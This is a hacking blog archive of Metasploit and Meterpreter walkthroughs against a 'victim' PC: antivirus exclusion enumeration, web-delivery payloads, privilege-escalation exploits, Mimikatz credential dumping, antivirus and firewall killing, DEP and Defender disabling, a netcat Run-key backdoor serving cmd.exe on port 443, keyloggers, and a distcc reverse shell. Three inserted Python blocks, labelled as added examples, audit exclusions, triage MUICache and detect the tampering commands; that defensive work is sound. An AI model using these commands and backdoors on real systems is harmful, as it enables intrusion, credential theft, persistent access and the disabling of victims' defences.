
Friday, 15 January 2016

How to Get Information of Antivirus in Remote Victim PC using Metasploit


Windows Antivirus Exclusions Enumeration

This module will enumerate the file, directory, process and extension-based exclusions from supported AV products, which currently includes Microsoft Defender, Microsoft Security Essentials/Antimalware, and Symantec Endpoint Protection.

Module Name

post/windows/gather/enum_av_excluded

msf > use post/windows/gather/enum_av_excluded
msf post(enum_av_excluded) > sessions
            ...sessions...
msf post(enum_av_excluded) > set SESSION <session-id>
msf post(enum_av_excluded) > show options
            ...show and set options...
msf post(enum_av_excluded) > run
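The same exclusion data is worth reading from the administrator's side: an exclusion list that has been widened to cover a user-writable folder, a whole drive or a script host is exactly what the module above is looking for. The following Python audit is an added example, not code from the post or from the Metasploit module. The exclusion list is constructed for the example; on a real host it would be read from the Windows Defender Exclusions registry keys (Paths, Extensions, Processes) or from Get-MpPreference, and the risk rules are this example's own assumptions about what a reviewer should question.

```python
"""Audit Windows Defender exclusions for entries that widen an attacker's room.

Added example: not from the original post or the Metasploit module. The
exclusion list is constructed for this example; on a real host an
administrator would read it from
HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\{Paths,Extensions,Processes}
(or Get-MpPreference), which is also where the post's module reads it.
"""
import fnmatch
import ntpath
import re

# Constructed sample: mixes legitimate exclusions (database files, a backup
# agent) with ones that effectively switch scanning off where it matters.
SAMPLE_EXCLUSIONS = {
    "Paths": [
        "C:\\Program Files\\SQLServer\\Data",
        "C:\\Users\\alice\\AppData\\Local\\Temp",
        "C:\\",
        "C:\\Users\\Public\\Downloads",
    ],
    "Extensions": ["mdf", "exe", "ps1"],
    "Processes": ["C:\\Program Files\\Backup\\agent.exe", "powershell.exe", "nc.exe"],
}

# Locations a standard user can write to: an exclusion here means anything
# dropped there runs unscanned. (Assumed list for this example.)
USER_WRITABLE = (
    "*\\Users\\*\\AppData\\*",
    "*\\Users\\Public\\*",
    "*\\Temp",
    "*\\Temp\\*",
    "*\\Downloads",
    "*\\Downloads\\*",
    "*\\ProgramData\\*",
)
# Extensions whose content is code rather than data.
EXEC_EXTENSIONS = {"exe", "dll", "sys", "scr", "com", "msi",
                   "ps1", "bat", "cmd", "vbs", "js", "jse", "hta"}
# Interpreters and system utilities that run whatever they are handed; a
# process exclusion means files these processes open are not scanned.
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                "mshta.exe", "rundll32.exe", "regsvr32.exe", "msbuild.exe"}


def drive_wide(path):
    """True for a bare drive root (C:\\) or a wildcard that covers a whole drive."""
    p = path.strip().lower().rstrip("\\")
    return re.fullmatch(r"(?:[a-z]:)?(?:\\?\*)?", p) is not None


def in_user_writable(path):
    p = path.strip().lower().rstrip("\\")
    return any(fnmatch.fnmatchcase(p, pat.lower()) for pat in USER_WRITABLE)


def process_findings(entry):
    name = ntpath.basename(entry).lower()
    reasons = []
    if ntpath.dirname(entry) == "":
        reasons.append("bare process name: any binary called %s, in any directory, "
                       "inherits the exclusion" % name)
    if name in SCRIPT_HOSTS:
        reasons.append("script host or system utility excluded: files it opens are not scanned")
    return reasons


def audit_exclusions(exclusions):
    """Return (kind, entry, reason) for every exclusion that looks risky."""
    findings = []
    for path in exclusions.get("Paths", []):
        if drive_wide(path):
            findings.append(("Paths", path, "entire drive excluded"))
        elif in_user_writable(path):
            findings.append(("Paths", path, "user-writable location excluded"))
    for ext in exclusions.get("Extensions", []):
        if ext.strip().lstrip(".").lower() in EXEC_EXTENSIONS:
            findings.append(("Extensions", ext, "executable or script extension excluded"))
    for proc in exclusions.get("Processes", []):
        for reason in process_findings(proc):
            findings.append(("Processes", proc, reason))
    return findings


if __name__ == "__main__":
    for kind, entry, reason in audit_exclusions(SAMPLE_EXCLUSIONS):
        print("%-10s %-45s %s" % (kind, entry, reason))
```

Run against the constructed list, the database directory and the backup agent pass while the temp folder, the drive root, the public Downloads folder, the exe and ps1 extensions and both bare process names are reported; the process rule is the one most often missed in reviews, because a name-only exclusion applies to any binary with that name wherever it lives.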

Thursday, 14 January 2016

Web Delivery metasploit Script



This module quickly fires up a web server that serves a payload. The provided command will start the specified scripting language interpreter and then download and execute the payload. The main purpose of this module is to quickly establish a session on a target machine when the attacker has to manually type in the command himself, e.g. Command Injection, RDP Session, Local Access or maybe Remote Command Exec. This attack vector does not write to disk so it is less likely to trigger AV solutions and will allow privilege escalations supplied by Meterpreter. When using either of the PSH targets, ensure the payload architecture matches the target computer or use SYSWOW64 powershell.exe to execute x86 payloads on x64 machines.

msf > use exploit/multi/script/web_delivery
msf exploit(web_delivery) > show targets
            ...targets...

msf exploit(web_delivery) > set TARGET <target-id>
msf exploit(web_delivery) > show options
            ...show and set options...
msf exploit(web_delivery) > exploit


Tuesday, 7 April 2015

A-PDF WAV to MP3 v1.0.0 Buffer Overflow



This module exploits a buffer overflow in A-PDF WAV to MP3 v1.0.0. When the application is used to import a specially crafted m3u file, a buffer overflow occurs allowing arbitrary code execution.

exploit : exploit/windows/fileformat/a_pdf_wav_to_mp3

msf > use exploit/windows/fileformat/a_pdf_wav_to_mp3
msf exploit(a_pdf_wav_to_mp3) > show targets
...targets...
msf exploit(a_pdf_wav_to_mp3) > set TARGET <target-id>
msf exploit(a_pdf_wav_to_mp3) > show options
...show and set options...
msf exploit(a_pdf_wav_to_mp3) > exploit

Windows Gather Enum User MUICache metasploit module



This module gathers information about the files and file paths that logged-on users have executed on the system. It also checks whether each file still exists on the system. This information is gathered from the MUICache registry key. If the user is logged in when the module is executed, it collects the MUICache entries by accessing the registry directly. If the user is not logged in, the module downloads the user's registry hive (NTUSER.DAT/UsrClass.dat) from the system and parses the MUICache contents from the downloaded hive.

Module : post/windows/gather/enum_muicache

msf > use post/windows/gather/enum_muicache 
msf post(enum_muicache) > sessions
         ...sessions...
msf post(enum_muicache) > set SESSION <session-id>
msf post(enum_muicache) > show options
        ...show and set options...
msf post(enum_muicache) > run

Sunday, 5 April 2015

How to install Metasploit in ubuntu




The Metasploit Project is a computer security project that provides information about security vulnerabilities and aids in penetration testing and IDS signature development.
Its best-known sub-project is the open source Metasploit Framework, a tool for developing and executing exploit code against a remote target machine. Other important sub-projects include the Opcode Database, shellcode archive and related research.
The Metasploit Project is well known for its anti-forensic and evasion tools, some of which are built into the Metasploit Framework.

Click here to download metasploit for ubuntu


Wednesday, 1 April 2015

Reflective DLL Injection Metasploit Module



Reflective DLL injection is a library injection technique in which the concept of reflective programming is employed to perform the loading of a library from memory into a host process. As such the library is responsible for loading itself by implementing a minimal Portable Executable (PE) file loader. It can then govern, with minimal interaction with the host system and process, how it will load and interact with the host.

Injection works from Windows NT4 up to and including Windows 8, running on x86, x64 and ARM where applicable.

Download  : Reflective DLL Injection Exploit


Tuesday, 31 March 2015

Windows Manage Memory Payload Injection



This module will inject a payload into memory of a process. If a payload isn't selected, then it'll default to a reverse x86 TCP meterpreter. If the PID datastore option isn't specified, then it'll inject into notepad.exe instead.

Exploit : exploit/windows/local/payload_inject


Saturday, 28 March 2015

Windows SYSTEM Escalation via KiTrap0D


This module will create a new session with SYSTEM privileges via the KiTrap0D exploit by Tavis Ormandy. If the session in use is already elevated, the exploit will not run. The module relies on kitrap0d.x86.dll and is not supported on x64 editions of Windows.

exploit : exploit/windows/local/ms10_015_kitrap0d

Targets : Windows 2K SP4 - Windows 7 (x86)



Win32k.sys elevation of privilege vulnerability






win32k.sys, the kernel-mode driver in Microsoft Windows Server 2003 SP2, Windows Vista SP2, Windows Server 2008 SP2 and R2 SP1, Windows 7 SP1, Windows 8, Windows 8.1, Windows Server 2012 Gold and R2, and Windows RT Gold and 8.1, allows local users to gain privileges via a crafted application, as exploited in the wild in October 2014, aka "Win32k.sys Elevation of Privilege Vulnerability."

Vulnerable systems : Windows XP SP3, Windows 2003 SP2, Windows 7 SP1, Windows 2008 32-bit and Windows 2008 R2 SP1 64-bit

Click Here to Get exploit


Tuesday, 15 July 2014

Dumping Cleartext login Credentials with Mimikatz

Mimikatz is a tool that can dump clear text passwords from memory.


Click here to Download Mimikatz

On modern Windows systems where UAC is in place, we will need to bypass it with the Metasploit post-exploitation module bypassuac (post/windows/escalate/bypassuac) in order to execute Mimikatz.


Sunday, 13 July 2014

Best Meterpreter Script



getcountermeasure

Getcountermeasure is an automated script that disables security measures such as antivirus, firewall, and more.

Command : run getcountermeasure


winenum

The winenum script is used to dump tokens, hashes and more.

Command : run winenum

getgui

The getgui script is used to enable RDP on a target system.

Command : run getgui -e


killav

Killav is used to disable most antivirus programs.

Command : run killav

gettelnet

The gettelnet script is used to enable telnet on the victim.

Command : run gettelnet -e

hostedit

The hostedit Meterpreter script is used to edit the Windows hosts file.

Command : run hostedit

checkvm

Checkvm is used to see if you exploited a virtual machine.

Command : run checkvm

screenspy

screenspy is used to take a screenshot of the remote PC.

Command : run screenspy

keylogrecorder

keylogrecorder is used to start a keylogger on the victim PC.

Command : run keylogrecorder

metsvc

metsvc is used to install a permanent backdoor.

Friday, 11 July 2014

How to get MUICache Entries in Remote Windows Machine


According to Nirsoft.net, “each time that you start using a new application, Windows operating system automatically extract the application name from the version resource of the exe file, and stores it for using it later, in Registry key known as the ‘MuiCache’.”

msf > use post/windows/gather/enum_muicache
msf post(enum_muicache) > set payload windows/meterpreter/reverse_tcp
msf post(enum_muicache) > set lhost 192.168.1.3 (IP of Local Host)
msf post(enum_muicache) > set session 2
msf post(enum_muicache) > exploit
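MUICache is also a standard evidence-of-execution artifact for an investigator working on a disk image or a live host of their own. As an added example (not code from the post or from the enum_muicache module), the Python below parses MUICache values as `reg query` prints them, rebuilds one record per executable and checks whether that executable is still on disk, which is the same "does the file still exist" check the module performs. The `reg query` output is constructed for the example; the key location and the `.FriendlyAppName` / `.ApplicationCompany` value-name suffixes are those used by Windows 7 and later (older versions keep the cache under ShellNoRoam\MUICache with the path alone as the value name).

```python
"""Triage MUICache entries: which executables were run, and are they still there?

Added example, not part of the original post or of the Metasploit module.
The reg query output below is constructed; value names follow the Windows 7+
layout "<path>.FriendlyAppName" / "<path>.ApplicationCompany".
"""
import os
import re

SAMPLE_REG_QUERY = r"""
HKEY_CURRENT_USER\Software\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
    C:\Users\alice\Downloads\setup.exe.FriendlyAppName    REG_SZ    Setup
    C:\Users\alice\Downloads\setup.exe.ApplicationCompany    REG_SZ    Example Corp
    C:\Program Files\7-Zip\7zFM.exe.FriendlyAppName    REG_SZ    7-Zip File Manager
    C:\Users\alice\AppData\Local\Temp\updater.exe.FriendlyAppName    REG_SZ    Updater
    LangID    REG_BINARY    0904
"""

SUFFIXES = (".FriendlyAppName", ".ApplicationCompany")


def parse_muicache(text):
    """Map executable path -> {"FriendlyAppName": ..., "ApplicationCompany": ...}.

    reg query separates name, type and data with runs of spaces; a maxsplit of 2
    keeps data intact even when it contains double spaces itself.
    """
    entries = {}
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.upper().startswith("HKEY_"):
            continue                      # blank line or the key header
        parts = re.split(r"\s{2,}|\t+", line, maxsplit=2)
        if len(parts) != 3 or parts[1] != "REG_SZ":
            continue                      # LangID and other non-string values
        name, _, data = parts
        for suffix in SUFFIXES:
            if name.endswith(suffix):
                path = name[: -len(suffix)]
                entries.setdefault(path, {})[suffix[1:]] = data
                break
    return entries


def triage(text, exists=os.path.exists):
    """One row per executable recorded in the cache, with a present/missing flag.

    `exists` is injectable so an analyst can evaluate against a mounted image
    (or, as in the test, a constructed view of the filesystem).
    """
    rows = []
    for path, info in parse_muicache(text).items():
        rows.append({
            "path": path,
            "name": info.get("FriendlyAppName", ""),
            "company": info.get("ApplicationCompany", ""),
            "present": bool(exists(path)),
        })
    return rows


if __name__ == "__main__":
    for row in triage(SAMPLE_REG_QUERY):
        flag = "present" if row["present"] else "MISSING"
        print("%-8s %-55s %s" % (flag, row["path"], row["name"]))
```

Entries whose binary has since disappeared, particularly from Downloads or a Temp directory, are the ones worth pulling into a timeline next to the prefetch and UserAssist data, since the cache records that the program ran even after it was cleaned up.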


How to Disable Windows Firewall using Metasploit



Windows Firewall can help protect your PC from hackers and malicious software. In Windows 7, it is still powerful—but we have made it more flexible and easier to use.

For example, now you can fine-tune the protection and notifications you want for each of your network profiles—Home, Work, and Public. When you are connected to a public network like a library or a coffee shop, you may want to block all incoming connections. At home or work, this might be overkill. Whatever level of protection you choose for your profiles, you will be able to switch between them with ease.

Command : 

netsh firewall set opmode disable 

Thursday, 10 July 2014

How to Install Netcat Backdoor on a Remote Machine Using Metasploit


When attackers successfully compromise a system, they need to maintain access. That is why they usually install a backdoor on the victim computer for future use, so that they can easily reconnect to it, use its resources and collect data from it.

1 - First we must upload netcat to the remote system.
Command :
meterpreter > upload /usr/share/windows-binaries/nc.exe C:\\windows\\system32

2 - Next we look at the registry Run key, where netcat will be registered to execute on start-up and listen on port 443.
Command :
meterpreter > reg enumkey -k HKLM\\software\\microsoft\\windows\\currentversion\\run

3 - Add NetCat to the start-up entries.
Command :
meterpreter > reg setval -k HKLM\\software\\microsoft\\windows\\currentversion\\run -v nc -d 'C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe'

4 - Check whether our backdoor is in the autorun entries.
Command :
meterpreter > reg queryval -k HKLM\\software\\microsoft\\windows\\currentversion\\Run -v nc



Wednesday, 9 July 2014

How to Stop the Data Execution Prevention (DEP) Service using Metasploit in Windows


Data Execution Prevention (DEP) is a security feature that can help prevent damage to your computer from viruses and other security threats. Harmful programs can try to attack Windows by attempting to run (also known as execute) code from system memory locations reserved for Windows and other authorized programs. These types of attacks can harm your programs and files.

DEP can help protect your computer by monitoring your programs to make sure that they use system memory safely. If DEP notices a program on your computer using memory incorrectly, it closes the program and notifies you.

Command : bcdedit.exe /set {current} nx AlwaysOff

Tuesday, 8 July 2014

How to Stop Windows Defender Service in remote pc using Metasploit


When Windows Defender is on, you're notified when spyware or other potentially unwanted software tries to install itself or run on your computer. If you use the default settings, Windows Defender also checks for new definitions (files that are used to determine if software is spyware) and automatically removes any detected item that has a recommended removal action.

Command : net stop WinDefend
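Each of the commands in these posts (netsh firewall set opmode disable, bcdedit /set {current} nx AlwaysOff, net stop WinDefend, and the Run-key netcat entry from the netcat backdoor post) leaves a clear trace in process-creation and registry-modification telemetry, and a host where several of them fire from one account within minutes is rarely doing maintenance. The Python below is an added example, not from the original posts: it runs a small rule set over constructed log lines in a simplified Sysmon-like layout (timestamp|event_id|user|detail, where event 1 is process creation and event 13 a registry value set). Users, timestamps and the field layout are invented for the example; the netsh advfirewall form is included as a generalization to Vista and later, where the old netsh firewall context is deprecated.

```python
"""Flag defence-tampering commands in endpoint telemetry.

Added example: not from the original posts. The log lines below are
constructed in a simplified Sysmon-like layout (timestamp|event_id|user|detail)
where event 1 is process creation with the command line as detail and event 13
is a registry value set with "key\\value = data" as detail. Users, times and
the layout are invented for this example.
"""
import re
from collections import defaultdict

SAMPLE_LOG = r"""
2014-07-10T09:12:03|1|CORP\alice|"C:\Windows\System32\netsh.exe" firewall set opmode disable
2014-07-10T09:12:41|1|CORP\alice|bcdedit.exe /set {current} nx AlwaysOff
2014-07-10T09:13:05|1|CORP\alice|net stop WinDefend
2014-07-10T09:13:30|13|CORP\alice|HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\nc = C:\windows\system32\nc.exe -Ldp 443 -e cmd.exe
2014-07-10T09:14:00|1|CORP\bob|net use Z: \\fileserver\share
2014-07-10T09:14:10|13|CORP\bob|HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\OneDrive = C:\Users\bob\AppData\Local\Microsoft\OneDrive\OneDrive.exe /background
"""

# (rule name, event id the rule applies to, pattern matched against the detail field)
RULES = [
    ("firewall_disabled", 1, re.compile(
        r'\bnetsh(\.exe)?"?\s+(firewall\s+set\s+opmode\s+(mode=)?disable'
        r'|advfirewall\s+set\s+\w+\s+state\s+off)', re.I)),   # advfirewall: Vista and later
    ("dep_disabled", 1, re.compile(r"\bbcdedit(\.exe)?\b.*\bnx\s+AlwaysOff\b", re.I)),
    ("defender_stopped", 1, re.compile(r"\b(net|sc)(\.exe)?\s+stop\s+WinDefend\b", re.I)),
    # an autorun value that starts a listener handing out a command shell
    ("run_key_listener", 13, re.compile(
        r"\\CurrentVersion\\Run\\[^=]*=.*\b(nc|ncat|netcat)(\.exe)?\b.*-e\s+\S*cmd", re.I)),
]


def parse_line(line):
    ts, event_id, user, detail = line.split("|", 3)
    return {"ts": ts, "event_id": int(event_id), "user": user, "detail": detail}


def detect(log_text):
    """Return (rule, user, detail) for every line that matches a rule."""
    hits = []
    for raw in log_text.splitlines():
        if not raw.strip():
            continue
        rec = parse_line(raw)
        for name, event_id, pattern in RULES:
            if rec["event_id"] == event_id and pattern.search(rec["detail"]):
                hits.append((name, rec["user"], rec["detail"]))
    return hits


def tampering_bursts(hits, min_rules=2):
    """Users who tripped at least min_rules distinct rules.

    One firewall change can be an admin; several different protections being
    switched off by the same account is the signal worth paging on.
    """
    seen = defaultdict(set)
    for name, user, _ in hits:
        seen[user].add(name)
    return sorted(u for u, names in seen.items() if len(names) >= min_rules)


if __name__ == "__main__":
    found = detect(SAMPLE_LOG)
    for name, user, detail in found:
        print("%-18s %-12s %s" % (name, user, detail))
    print("burst:", tampering_bursts(found))
```

Bob's drive mapping and his OneDrive autorun pass through untouched, while alice trips all four rules and is the only account reported by the burst check; in production the same rules would sit on the real Sysmon or 4688/4657 fields rather than the constructed pipe-delimited lines.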


Saturday, 7 September 2013

Fix msfupdate Problem


Error : Could not find pg-0.15.0 in any of the sources. Run `bundle install` to install missing gems

The reason for this error was that, while I was running the msfupdate command, it showed me an error in the pg-0.15.1 package installation.

Solution
  • Go to this path (for 64-bit BackTrack 5 R3) - root@bt: cd /opt/metasploit/ruby/lib/ruby/1.9.1/x86_64-linux/
  • Edit the file rbconfig.rb
  • Search for this line - CONFIG["LIBRUBYARG_STATIC"] = "-Wl,-R -Wl,$(libdir) -L$(libdir) -l$(RUBY_SO_NAME)-static" and remove this - -l$(RUBY_SO_NAME)-static
  • Save




Tuesday, 27 August 2013

Configure xssf Metasploit Plugin in Kali Linux


The Cross-Site Scripting Framework (XSSF) is a security tool designed to simplify the XSS vulnerability exploitation task. XSSF allows creating a communication channel with the targeted browser (XSS vulnerability) in order to perform further attacks. Users are free to select existing modules (a module = an attack) in order to target specific browsers. XSSF provides a powerful documented API, which facilitates development of modules and attacks. In addition, its integration into the Metasploit Framework allows users to launch MSF browser-based exploits easily from an XSS vulnerability.

How to Configure :

1 - Open a Kali Linux terminal and type cd /opt/metasploit/apps/pro/msf3

2 - In msf3, install XSSF using the following command

svn export http://xssf.googlecode.com/svn/trunk ./ --force

3 - Load the XSSF plugin using the command - load xssf



Friday, 22 March 2013

HTTP SSL Certificate Information using Metasploit Auxiliary module


Parse the server SSL certificate to obtain the common name and signature algorithm

Rank - Normal

Authors

  • et < et [at] metasploit.com >
  • Chris John Riley
  • Veit Hailperin < hailperv [at] gmail.com >


msf > use auxiliary/scanner/http/ssl
msf auxiliary(ssl) > set RHOSTS [TARGET HOST RANGE]
msf auxiliary(ssl) > run

Source Code : http://adf.ly/LL7LN




Wednesday, 20 March 2013

DistCC Daemon Command Execution


This Metasploit exploit uses a documented security weakness to execute arbitrary commands on any system running distccd.

distcc 2.x, as used in XCode 1.5 and others, when not configured to restrict access to the server port, allows remote attackers to execute arbitrary commands via compilation jobs, which are executed by the server without authorization checks.
Exploit Rank - Excellent
CVSS Score - 9.3

Commands :


msfconsole

msf > use exploit/unix/misc/distcc_exec
msf exploit(distcc_exec) > show payloads
msf exploit(distcc_exec) > set PAYLOAD generic/shell_reverse_tcp
msf exploit(distcc_exec) > set LHOST [MY IP ADDRESS]
msf exploit(distcc_exec) > set RHOST [TARGET IP]
msf exploit(distcc_exec) > exploit
